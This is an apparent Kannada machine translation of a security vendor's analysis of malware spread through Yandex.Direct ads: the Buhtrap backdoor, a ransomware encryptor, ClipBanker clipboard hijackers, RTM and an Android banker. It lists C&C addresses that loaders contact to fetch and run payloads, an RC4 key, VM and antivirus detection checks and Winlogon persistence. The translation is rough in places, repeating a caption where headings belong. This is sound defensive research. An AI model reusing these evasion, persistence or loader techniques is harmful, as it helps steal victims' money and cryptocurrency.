ಚಿತ್ರ 2. 512-ಬಿಟ್ RSA ಕೀ ಜೋಡಿ ಉತ್ಪಾದನೆಯ ಪ್ರಕ್ರಿಯೆಯ ಹೆಕ್ಸ್-ಕಿರಣಗಳ ವಿಭಜನೆಯ ಫಲಿತಾಂಶ.

ರಚಿತವಾದ ಖಾಸಗಿ ಕೀಲಿಯೊಂದಿಗೆ ಸರಳ ಪಠ್ಯದ ಉದಾಹರಣೆಯನ್ನು ಕೆಳಗೆ ನೀಡಲಾಗಿದೆ, ಇದು ರಾನ್ಸಮ್ ಸಂದೇಶಕ್ಕೆ ಲಗತ್ತಿಸಲಾದ ಟೋಕನ್ ಆಗಿದೆ.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

ದಾಳಿಕೋರರ ಸಾರ್ವಜನಿಕ ಕೀಯನ್ನು ಕೆಳಗೆ ನೀಡಲಾಗಿದೆ.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

128-ಬಿಟ್ ಕೀಲಿಯೊಂದಿಗೆ AES-256-CBC ಬಳಸಿಕೊಂಡು ಫೈಲ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ. ಪ್ರತಿ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ಗೆ, ಹೊಸ ಕೀ ಮತ್ತು ಹೊಸ ಇನಿಶಿಯಲೈಸೇಶನ್ ವೆಕ್ಟರ್ ಅನ್ನು ರಚಿಸಲಾಗುತ್ತದೆ. ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ನ ಕೊನೆಯಲ್ಲಿ ಪ್ರಮುಖ ಮಾಹಿತಿಯನ್ನು ಸೇರಿಸಲಾಗುತ್ತದೆ. ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ನ ಸ್ವರೂಪವನ್ನು ಪರಿಗಣಿಸೋಣ.
ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ಗಳು ಈ ಕೆಳಗಿನ ಹೆಡರ್ ಅನ್ನು ಹೊಂದಿವೆ:

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ

VEGA ಮ್ಯಾಜಿಕ್ ಮೌಲ್ಯದ ಸೇರ್ಪಡೆಯೊಂದಿಗೆ ಮೂಲ ಫೈಲ್ ಡೇಟಾವನ್ನು ಮೊದಲ 0x5000 ಬೈಟ್‌ಗಳಿಗೆ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ. ಎಲ್ಲಾ ಡೀಕ್ರಿಪ್ಶನ್ ಮಾಹಿತಿಯನ್ನು ಈ ಕೆಳಗಿನ ರಚನೆಯೊಂದಿಗೆ ಫೈಲ್‌ಗೆ ಲಗತ್ತಿಸಲಾಗಿದೆ:

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ

- ಫೈಲ್ ಗಾತ್ರದ ಮಾರ್ಕರ್ ಫೈಲ್ ಗಾತ್ರದಲ್ಲಿ 0x5000 ಬೈಟ್‌ಗಳಿಗಿಂತ ದೊಡ್ಡದಾಗಿದೆಯೇ ಎಂದು ಸೂಚಿಸುವ ಗುರುತು ಹೊಂದಿದೆ
— AES ಕೀ ಬ್ಲಾಬ್ = ZlibCompress(RSAEncrypt(AES ಕೀ + IV, ರಚಿತವಾದ RSA ಕೀ ಜೋಡಿಯ ಸಾರ್ವಜನಿಕ ಕೀ))
- RSA ಕೀ ಬ್ಲಾಬ್ = ZlibCompress(RSAEncrypt(ರಚಿತವಾದ RSA ಖಾಸಗಿ ಕೀ, ಹಾರ್ಡ್-ಕೋಡೆಡ್ RSA ಸಾರ್ವಜನಿಕ ಕೀ))

Win32/ClipBanker

Win32/ClipBanker ಎಂಬುದು ಅಕ್ಟೋಬರ್ ಅಂತ್ಯದಿಂದ ಡಿಸೆಂಬರ್ 2018 ರ ಆರಂಭದವರೆಗೆ ಮಧ್ಯಂತರವಾಗಿ ವಿತರಿಸಲಾದ ಒಂದು ಅಂಶವಾಗಿದೆ. ಕ್ಲಿಪ್‌ಬೋರ್ಡ್‌ನ ವಿಷಯಗಳನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುವುದು ಇದರ ಪಾತ್ರವಾಗಿದೆ, ಇದು ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ವ್ಯಾಲೆಟ್‌ಗಳ ವಿಳಾಸಗಳನ್ನು ಹುಡುಕುತ್ತದೆ. ಗುರಿ ವ್ಯಾಲೆಟ್ ವಿಳಾಸವನ್ನು ನಿರ್ಧರಿಸಿದ ನಂತರ, ClipBanker ಅದನ್ನು ಆಪರೇಟರ್‌ಗಳಿಗೆ ಸೇರಿದ ವಿಳಾಸದೊಂದಿಗೆ ಬದಲಾಯಿಸುತ್ತದೆ. ನಾವು ಪರೀಕ್ಷಿಸಿದ ಮಾದರಿಗಳು ಪೆಟ್ಟಿಗೆಯಲ್ಲ ಅಥವಾ ಅಸ್ಪಷ್ಟವಾಗಿರಲಿಲ್ಲ. ನಡವಳಿಕೆಯನ್ನು ಮರೆಮಾಚಲು ಬಳಸುವ ಏಕೈಕ ಕಾರ್ಯವಿಧಾನವೆಂದರೆ ಸ್ಟ್ರಿಂಗ್ ಎನ್‌ಕ್ರಿಪ್ಶನ್. ಆಪರೇಟರ್ ವ್ಯಾಲೆಟ್ ವಿಳಾಸಗಳನ್ನು RC4 ಬಳಸಿ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ. ಟಾರ್ಗೆಟ್ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿಗಳು ಬಿಟ್‌ಕಾಯಿನ್, ಬಿಟ್‌ಕಾಯಿನ್ ನಗದು, ಡಾಗ್‌ಕಾಯಿನ್, ಎಥೆರಿಯಮ್ ಮತ್ತು ರಿಪ್ಪಲ್.

ದಾಳಿಕೋರರ ಬಿಟ್‌ಕಾಯಿನ್ ವ್ಯಾಲೆಟ್‌ಗಳಿಗೆ ಮಾಲ್‌ವೇರ್ ಹರಡುತ್ತಿದ್ದ ಅವಧಿಯಲ್ಲಿ, ಒಂದು ಸಣ್ಣ ಮೊತ್ತವನ್ನು VTS ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ, ಇದು ಅಭಿಯಾನದ ಯಶಸ್ಸಿನ ಮೇಲೆ ಅನುಮಾನವನ್ನು ಉಂಟುಮಾಡುತ್ತದೆ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಈ ವಹಿವಾಟುಗಳು ಕ್ಲಿಪ್‌ಬ್ಯಾಂಕರ್‌ಗೆ ಸಂಬಂಧಿಸಿವೆ ಎಂದು ಸೂಚಿಸಲು ಯಾವುದೇ ಪುರಾವೆಗಳಿಲ್ಲ.

Win32/RTM

Win32/RTM ಘಟಕವನ್ನು ಮಾರ್ಚ್ 2019 ರ ಆರಂಭದಲ್ಲಿ ಹಲವಾರು ದಿನಗಳವರೆಗೆ ವಿತರಿಸಲಾಯಿತು. RTM ಎಂಬುದು ಡೆಲ್ಫಿಯಲ್ಲಿ ಬರೆಯಲಾದ ಟ್ರೋಜನ್ ಬ್ಯಾಂಕರ್ ಆಗಿದ್ದು, ರಿಮೋಟ್ ಬ್ಯಾಂಕಿಂಗ್ ವ್ಯವಸ್ಥೆಗಳನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಂಡಿದೆ. 2017 ರಲ್ಲಿ, ESET ಸಂಶೋಧಕರು ಪ್ರಕಟಿಸಿದರು ವಿವರವಾದ ವಿಶ್ಲೇಷಣೆ ಈ ಕಾರ್ಯಕ್ರಮದ ವಿವರಣೆಯು ಇನ್ನೂ ಪ್ರಸ್ತುತವಾಗಿದೆ. ಜನವರಿ 2019 ರಲ್ಲಿ, ಪಾಲೊ ಆಲ್ಟೊ ನೆಟ್‌ವರ್ಕ್‌ಗಳು ಸಹ ಬಿಡುಗಡೆಗೊಂಡವು RTM ಬಗ್ಗೆ ಬ್ಲಾಗ್ ಪೋಸ್ಟ್.

ಬುಹ್ಟ್ರಾಪ್ ಲೋಡರ್

ಕೆಲವು ಸಮಯದವರೆಗೆ, GitHub ನಲ್ಲಿ ಡೌನ್‌ಲೋಡರ್ ಲಭ್ಯವಿತ್ತು, ಅದು ಹಿಂದಿನ Buhtrap ಪರಿಕರಗಳಂತೆಯೇ ಇರಲಿಲ್ಲ. ಅವನು ತಿರುಗುತ್ತಾನೆ https://94.100.18[.]67/RSS.php?<some_id> ಮುಂದಿನ ಹಂತವನ್ನು ಪಡೆಯಲು ಮತ್ತು ಅದನ್ನು ನೇರವಾಗಿ ಮೆಮೊರಿಗೆ ಲೋಡ್ ಮಾಡುತ್ತದೆ. ಎರಡನೇ ಹಂತದ ಕೋಡ್‌ನ ಎರಡು ನಡವಳಿಕೆಗಳನ್ನು ನಾವು ಪ್ರತ್ಯೇಕಿಸಬಹುದು. ಮೊದಲ URL ನಲ್ಲಿ, RSS.php ನೇರವಾಗಿ ಬುಹ್ಟ್ರಾಪ್ ಹಿಂಬಾಗಿಲನ್ನು ರವಾನಿಸಿದೆ - ಈ ಹಿಂಬಾಗಿಲು ಮೂಲ ಕೋಡ್ ಸೋರಿಕೆಯಾದ ನಂತರ ಲಭ್ಯವಿರುವ ಒಂದಕ್ಕೆ ಹೋಲುತ್ತದೆ.

ಕುತೂಹಲಕಾರಿಯಾಗಿ, ನಾವು ಬುಹ್ಟ್ರಾಪ್ ಹಿಂಬಾಗಿಲಿನೊಂದಿಗೆ ಹಲವಾರು ಪ್ರಚಾರಗಳನ್ನು ನೋಡುತ್ತೇವೆ ಮತ್ತು ಅವುಗಳನ್ನು ವಿವಿಧ ಆಪರೇಟರ್‌ಗಳು ನಡೆಸುತ್ತಿದ್ದಾರೆ ಎಂದು ಹೇಳಲಾಗುತ್ತದೆ. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಮುಖ್ಯ ವ್ಯತ್ಯಾಸವೆಂದರೆ ಹಿಂಬಾಗಿಲನ್ನು ನೇರವಾಗಿ ಮೆಮೊರಿಗೆ ಲೋಡ್ ಮಾಡಲಾಗಿದೆ ಮತ್ತು ನಾವು ಮಾತನಾಡಿದ DLL ನಿಯೋಜನೆ ಪ್ರಕ್ರಿಯೆಯೊಂದಿಗೆ ಸಾಮಾನ್ಯ ಯೋಜನೆಯನ್ನು ಬಳಸುವುದಿಲ್ಲ. ಮೊದಲು. ಜೊತೆಗೆ, ನಿರ್ವಾಹಕರು C&C ಸರ್ವರ್‌ಗೆ ನೆಟ್‌ವರ್ಕ್ ಟ್ರಾಫಿಕ್ ಅನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲು ಬಳಸುವ RC4 ಕೀಲಿಯನ್ನು ಬದಲಾಯಿಸಿದ್ದಾರೆ. ನಾವು ನೋಡಿದ ಹೆಚ್ಚಿನ ಪ್ರಚಾರಗಳಲ್ಲಿ, ಆಪರೇಟರ್‌ಗಳು ಈ ಕೀಲಿಯನ್ನು ಬದಲಾಯಿಸಲು ಚಿಂತಿಸಲಿಲ್ಲ.

ಎರಡನೆಯದು, ಹೆಚ್ಚು ಸಂಕೀರ್ಣವಾದ ನಡವಳಿಕೆಯೆಂದರೆ RSS.php URL ಅನ್ನು ಮತ್ತೊಂದು ಲೋಡರ್‌ಗೆ ರವಾನಿಸಲಾಗಿದೆ. ಡೈನಾಮಿಕ್ ಆಮದು ಕೋಷ್ಟಕವನ್ನು ಮರುನಿರ್ಮಾಣದಂತಹ ಕೆಲವು ಅಸ್ಪಷ್ಟತೆಯನ್ನು ಇದು ಕಾರ್ಯಗತಗೊಳಿಸಿತು. C&C ಸರ್ವರ್ ಅನ್ನು ಸಂಪರ್ಕಿಸುವುದು ಬೂಟ್‌ಲೋಡರ್‌ನ ಉದ್ದೇಶವಾಗಿದೆ msiofficeupd[.]com/api/F27F84EDA4D13B15/2, ಲಾಗ್‌ಗಳನ್ನು ಕಳುಹಿಸಿ ಮತ್ತು ಪ್ರತಿಕ್ರಿಯೆಗಾಗಿ ನಿರೀಕ್ಷಿಸಿ. ಇದು ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ಬ್ಲಬ್ ಆಗಿ ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುತ್ತದೆ, ಅದನ್ನು ಮೆಮೊರಿಗೆ ಲೋಡ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಅದನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ. ಈ ಲೋಡರ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವುದನ್ನು ನಾವು ನೋಡಿದ ಪೇಲೋಡ್ ಅದೇ ಬುಹ್ಟ್ರಾಪ್ ಬ್ಯಾಕ್‌ಡೋರ್ ಆಗಿತ್ತು, ಆದರೆ ಇತರ ಘಟಕಗಳು ಇರಬಹುದು.

Android/Spy.Banker

ಕುತೂಹಲಕಾರಿಯಾಗಿ, Android ಗಾಗಿ ಒಂದು ಘಟಕವು GitHub ರೆಪೊಸಿಟರಿಯಲ್ಲಿಯೂ ಕಂಡುಬಂದಿದೆ. ಅವರು ಕೇವಲ ಒಂದು ದಿನ ಮುಖ್ಯ ಶಾಖೆಯಲ್ಲಿದ್ದರು - ನವೆಂಬರ್ 1, 2018. GitHub ನಲ್ಲಿ ಪೋಸ್ಟ್ ಮಾಡುವುದರ ಹೊರತಾಗಿ, ESET ಟೆಲಿಮೆಟ್ರಿಯು ಈ ಮಾಲ್‌ವೇರ್ ಅನ್ನು ವಿತರಿಸಿದ ಯಾವುದೇ ಪುರಾವೆಯನ್ನು ಕಂಡುಕೊಳ್ಳುವುದಿಲ್ಲ.

ಘಟಕವನ್ನು Android ಅಪ್ಲಿಕೇಶನ್ ಪ್ಯಾಕೇಜ್ (APK) ಆಗಿ ಹೋಸ್ಟ್ ಮಾಡಲಾಗಿದೆ. ಇದು ಅತೀವವಾಗಿ ಅಸ್ಪಷ್ಟವಾಗಿದೆ. ದುರುದ್ದೇಶಪೂರಿತ ನಡವಳಿಕೆಯನ್ನು APK ಯಲ್ಲಿರುವ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ JAR ನಲ್ಲಿ ಮರೆಮಾಡಲಾಗಿದೆ. ಈ ಕೀಲಿಯನ್ನು ಬಳಸಿಕೊಂಡು ಇದನ್ನು RC4 ನೊಂದಿಗೆ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

ಸ್ಟ್ರಿಂಗ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲು ಅದೇ ಕೀ ಮತ್ತು ಅಲ್ಗಾರಿದಮ್ ಅನ್ನು ಬಳಸಲಾಗುತ್ತದೆ. JAR ನಲ್ಲಿ ಇದೆ APK_ROOT + image/files. ಫೈಲ್‌ನ ಮೊದಲ 4 ಬೈಟ್‌ಗಳು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ JAR ನ ಉದ್ದವನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ, ಇದು ಉದ್ದದ ಕ್ಷೇತ್ರದ ನಂತರ ತಕ್ಷಣವೇ ಪ್ರಾರಂಭವಾಗುತ್ತದೆ.

ಫೈಲ್ ಅನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ನಂತರ, ಅದು ಅನುಬಿಸ್ ಎಂದು ನಾವು ಕಂಡುಹಿಡಿದಿದ್ದೇವೆ - ಹಿಂದೆ ದಾಖಲಿಸಲಾಗಿದೆ Android ಗಾಗಿ ಬ್ಯಾಂಕರ್. ಮಾಲ್ವೇರ್ ಈ ಕೆಳಗಿನ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಹೊಂದಿದೆ:

  • ಮೈಕ್ರೊಫೋನ್ ರೆಕಾರ್ಡಿಂಗ್
  • ಸ್ಕ್ರೀನ್‌ಶಾಟ್‌ಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳುವುದು
  • GPS ನಿರ್ದೇಶಾಂಕಗಳನ್ನು ಪಡೆಯುವುದು
  • ಕೀಲಿ ಭೇದಕ
  • ಸಾಧನದ ಡೇಟಾ ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಮತ್ತು ರಾನ್ಸಮ್ ಬೇಡಿಕೆ
  • ಸ್ಪ್ಯಾಮಿಂಗ್

ಕುತೂಹಲಕಾರಿಯಾಗಿ, ಬ್ಯಾಂಕರ್ ಮತ್ತೊಂದು C&C ಸರ್ವರ್ ಅನ್ನು ಪಡೆಯಲು Twitter ಅನ್ನು ಬ್ಯಾಕಪ್ ಸಂವಹನ ಚಾನಲ್ ಆಗಿ ಬಳಸಿದ್ದಾರೆ. ನಾವು ವಿಶ್ಲೇಷಿಸಿದ ಮಾದರಿಯು @JonesTrader ಖಾತೆಯನ್ನು ಬಳಸಿದೆ, ಆದರೆ ವಿಶ್ಲೇಷಣೆಯ ಸಮಯದಲ್ಲಿ ಅದನ್ನು ಈಗಾಗಲೇ ನಿರ್ಬಂಧಿಸಲಾಗಿದೆ.

ಬ್ಯಾಂಕರ್ Android ಸಾಧನದಲ್ಲಿ ಗುರಿ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಪಟ್ಟಿಯನ್ನು ಹೊಂದಿದೆ. ಇದು ಸೋಫೋಸ್ ಅಧ್ಯಯನದಲ್ಲಿ ಪಡೆದ ಪಟ್ಟಿಗಿಂತ ಉದ್ದವಾಗಿದೆ. ಪಟ್ಟಿಯು ಅನೇಕ ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು, Amazon ಮತ್ತು eBay ನಂತಹ ಆನ್‌ಲೈನ್ ಶಾಪಿಂಗ್ ಕಾರ್ಯಕ್ರಮಗಳು ಮತ್ತು ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ಸೇವೆಗಳನ್ನು ಒಳಗೊಂಡಿದೆ.

MSIL/ClipBanker.IH

ಈ ಅಭಿಯಾನದ ಭಾಗವಾಗಿ ವಿತರಿಸಲಾದ ಕೊನೆಯ ಅಂಶವೆಂದರೆ .NET ವಿಂಡೋಸ್ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದ, ಇದು ಮಾರ್ಚ್ 2019 ರಲ್ಲಿ ಕಾಣಿಸಿಕೊಂಡಿತು. ಅಧ್ಯಯನ ಮಾಡಿದ ಹೆಚ್ಚಿನ ಆವೃತ್ತಿಗಳನ್ನು ConfuserEx v1.0.0 ನೊಂದಿಗೆ ಪ್ಯಾಕ್ ಮಾಡಲಾಗಿದೆ. ಕ್ಲಿಪ್‌ಬ್ಯಾಂಕರ್‌ನಂತೆ, ಈ ಘಟಕವು ಕ್ಲಿಪ್‌ಬೋರ್ಡ್ ಅನ್ನು ಬಳಸುತ್ತದೆ. ಅವರ ಗುರಿಯು ವ್ಯಾಪಕ ಶ್ರೇಣಿಯ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿಗಳು, ಹಾಗೆಯೇ ಸ್ಟೀಮ್‌ನಲ್ಲಿನ ಕೊಡುಗೆಗಳು. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಅವರು Bitcoin ಖಾಸಗಿ WIF ಕೀಲಿಯನ್ನು ಕದಿಯಲು IP ಲಾಗರ್ ಸೇವೆಯನ್ನು ಬಳಸುತ್ತಾರೆ.

ರಕ್ಷಣೆಯ ಕಾರ್ಯವಿಧಾನಗಳು
ಡೀಬಗ್ ಮಾಡುವಿಕೆ, ಡಂಪಿಂಗ್ ಮತ್ತು ಟ್ಯಾಂಪರಿಂಗ್ ಅನ್ನು ತಡೆಗಟ್ಟುವಲ್ಲಿ ConfuserEx ಒದಗಿಸುವ ಪ್ರಯೋಜನಗಳ ಜೊತೆಗೆ, ಘಟಕವು ಆಂಟಿವೈರಸ್ ಉತ್ಪನ್ನಗಳು ಮತ್ತು ವರ್ಚುವಲ್ ಯಂತ್ರಗಳನ್ನು ಪತ್ತೆಹಚ್ಚುವ ಸಾಮರ್ಥ್ಯವನ್ನು ಒಳಗೊಂಡಿದೆ.

ಇದು ವರ್ಚುವಲ್ ಗಣಕದಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ ಎಂದು ಪರಿಶೀಲಿಸಲು, ಮಾಲ್ವೇರ್ BIOS ಮಾಹಿತಿಯನ್ನು ವಿನಂತಿಸಲು ಅಂತರ್ನಿರ್ಮಿತ ವಿಂಡೋಸ್ WMI ಕಮಾಂಡ್ ಲೈನ್ (WMIC) ಅನ್ನು ಬಳಸುತ್ತದೆ, ಅವುಗಳೆಂದರೆ:

wmic bios

ನಂತರ ಪ್ರೋಗ್ರಾಂ ಕಮಾಂಡ್ ಔಟ್‌ಪುಟ್ ಅನ್ನು ಪಾರ್ಸ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಕೀವರ್ಡ್‌ಗಳನ್ನು ಹುಡುಕುತ್ತದೆ: VBOX, VirtualBox, XEN, qemu, bochs, VM.

ಆಂಟಿವೈರಸ್ ಉತ್ಪನ್ನಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಲು, ಮಾಲ್ವೇರ್ ವಿಂಡೋಸ್ ಮ್ಯಾನೇಜ್ಮೆಂಟ್ ಇನ್ಸ್ಟ್ರುಮೆಂಟೇಶನ್ (WMI) ವಿನಂತಿಯನ್ನು ವಿಂಡೋಸ್ ಭದ್ರತಾ ಕೇಂದ್ರಕ್ಕೆ ಕಳುಹಿಸುತ್ತದೆ ManagementObjectSearcher ಕೆಳಗೆ ತೋರಿಸಿರುವಂತೆ API. ಬೇಸ್ 64 ರಿಂದ ಡಿಕೋಡ್ ಮಾಡಿದ ನಂತರ ಕರೆ ಈ ರೀತಿ ಕಾಣುತ್ತದೆ:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ
ಚಿತ್ರ 3. ಆಂಟಿವೈರಸ್ ಉತ್ಪನ್ನಗಳನ್ನು ಗುರುತಿಸುವ ಪ್ರಕ್ರಿಯೆ.

ಹೆಚ್ಚುವರಿಯಾಗಿ, ಮಾಲ್ವೇರ್ ಎಂಬುದನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ ಕ್ರಿಪ್ಟೋಕ್ಲಿಪ್ ವಾಚರ್, ಕ್ಲಿಪ್‌ಬೋರ್ಡ್ ದಾಳಿಯಿಂದ ರಕ್ಷಿಸುವ ಸಾಧನ ಮತ್ತು ಚಾಲನೆಯಲ್ಲಿದ್ದರೆ, ಆ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿನ ಎಲ್ಲಾ ಥ್ರೆಡ್‌ಗಳನ್ನು ಅಮಾನತುಗೊಳಿಸುತ್ತದೆ, ಇದರಿಂದಾಗಿ ರಕ್ಷಣೆಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸುತ್ತದೆ.

ಹಠ

ನಾವು ಅಧ್ಯಯನ ಮಾಡಿದ ಮಾಲ್‌ವೇರ್‌ನ ಆವೃತ್ತಿಯು ಸ್ವತಃ ನಕಲು ಮಾಡುತ್ತದೆ %APPDATA%googleupdater.exe ಮತ್ತು google ಡೈರೆಕ್ಟರಿಗಾಗಿ "ಗುಪ್ತ" ಗುಣಲಕ್ಷಣವನ್ನು ಹೊಂದಿಸುತ್ತದೆ. ನಂತರ ಅವಳು ಮೌಲ್ಯವನ್ನು ಬದಲಾಯಿಸುತ್ತಾಳೆ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ವಿಂಡೋಸ್ ರಿಜಿಸ್ಟ್ರಿಯಲ್ಲಿ ಮತ್ತು ಮಾರ್ಗವನ್ನು ಸೇರಿಸುತ್ತದೆ updater.exe. ಈ ರೀತಿಯಾಗಿ, ಬಳಕೆದಾರರು ಪ್ರತಿ ಬಾರಿ ಲಾಗ್ ಇನ್ ಮಾಡಿದಾಗ ಮಾಲ್‌ವೇರ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ.

ದುರುದ್ದೇಶಪೂರಿತ ನಡವಳಿಕೆ

ಕ್ಲಿಪ್‌ಬ್ಯಾಂಕರ್‌ನಂತೆ, ಮಾಲ್‌ವೇರ್ ಕ್ಲಿಪ್‌ಬೋರ್ಡ್‌ನ ವಿಷಯಗಳನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುತ್ತದೆ ಮತ್ತು ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ವ್ಯಾಲೆಟ್ ವಿಳಾಸಗಳನ್ನು ಹುಡುಕುತ್ತದೆ ಮತ್ತು ಕಂಡುಬಂದಾಗ, ಅದನ್ನು ಆಪರೇಟರ್‌ನ ವಿಳಾಸಗಳಲ್ಲಿ ಒಂದನ್ನು ಬದಲಾಯಿಸುತ್ತದೆ. ಕೋಡ್‌ನಲ್ಲಿ ಕಂಡುಬರುವ ಗುರಿಯ ವಿಳಾಸಗಳ ಪಟ್ಟಿಯನ್ನು ಕೆಳಗೆ ನೀಡಲಾಗಿದೆ.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

ಪ್ರತಿಯೊಂದು ವಿಧದ ವಿಳಾಸಕ್ಕೂ ಅನುಗುಣವಾದ ನಿಯಮಿತ ಅಭಿವ್ಯಕ್ತಿ ಇರುತ್ತದೆ. STEAM_URL ಮೌಲ್ಯವನ್ನು ಸ್ಟೀಮ್ ಸಿಸ್ಟಮ್ ಮೇಲೆ ದಾಳಿ ಮಾಡಲು ಬಳಸಲಾಗುತ್ತದೆ, ಇದನ್ನು ಬಫರ್‌ನಲ್ಲಿ ವ್ಯಾಖ್ಯಾನಿಸಲು ಬಳಸಲಾಗುವ ನಿಯಮಿತ ಅಭಿವ್ಯಕ್ತಿಯಿಂದ ನೋಡಬಹುದಾಗಿದೆ:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

ಹೊರಹರಿವು ಚಾನಲ್

